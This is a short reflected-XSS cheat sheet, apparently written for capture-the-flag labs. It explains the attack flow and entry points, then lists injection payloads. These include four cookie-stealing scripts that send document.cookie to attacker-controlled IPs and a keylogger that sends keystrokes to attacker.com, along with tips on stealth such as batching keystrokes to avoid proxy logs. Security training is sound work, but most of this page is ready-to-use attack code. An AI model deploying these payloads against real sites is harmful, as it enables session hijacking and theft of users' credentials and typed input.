XSS Reflected
Reflected XSS
Reflected XSS starts with the attacker crafting a malicious URL that carries the payload in a parameter the vulnerable page echoes back into its response without encoding, then getting a victim to open it. The URL is usually delivered in a phishing email, but it can also be planted on a public site, for example as a link inside a comment. When the victim clicks it, the vulnerable site reflects the payload into the page and the script runs in the victim's browser under the site's origin. From there it can read document.cookie (unless the session cookie is flagged HttpOnly) and send it to a server the attacker controls; with the stolen session cookie the attacker can take over the user or admin session, which is called session hijacking. To summarize: the payload is never stored on the server (that is what separates reflected from stored XSS), so the attacker has to trick a victim into opening the URL every time they want it to run.
Entry points
Parameters in the URL Query String
URL File Path
Sometimes HTTP headers (e.g. Referer or User-Agent, when the page echoes them back)
Search Fields
Comments section
Contact Forms
Example Payloads
JS
<script>alert("Hello")</script>
<script>alert(window.location.hostname)</script>
"><script>alert('XSS');</script>
[breaks out of an input tag: the "> closes the value attribute and the tag, so the script is parsed as markup]
</textarea><script>alert('THM');</script>
[breaks out of a textarea: the closing </textarea> is required, since everything inside an open textarea is treated as text and a script tag there never runs]
';alert('Hi_There');//'
[breaks out of a single-quoted JavaScript string: the first ' terminates the string, the ; ends the statement, and the trailing // comments out whatever the page appends after the injection point]
Cookie Stealer
[1] JS
<script>fetch('http://10.8.133.250:8000/steal?cookie=' + btoa(document.cookie));</script>
[2] JS
<script>window.location='http://10.8.133.250:8000/cookie?'+document.cookie;</script>
[3] JS
<script>var myimg = new Image(); myimg.src = 'http://10.14.2.200/q?a=' + document.cookie;</script>
[4] JS
<script>document.location='http://ip:8000/XSS/grabber.php?c='+document.cookie;</script>
Caveat: document.cookie never includes cookies flagged HttpOnly, so if the session cookie carries that flag all four payloads return nothing useful. [2] and [4] also navigate the victim away from the page, which is noisy; [1] and [3] fire in the background.
Keylogger
<script>document.onkeypress =
function(e) {
fetch('http://attacker.com/log?key=' + btoa(e.key));
}</script>
Note: keypress is deprecated and does not fire for non-printing keys such as Enter, Tab or Backspace; hooking keydown instead captures every key. Each keystroke becomes its own request, which is easy to spot in proxy logs, so buffer keys and send them in batches if stealth matters.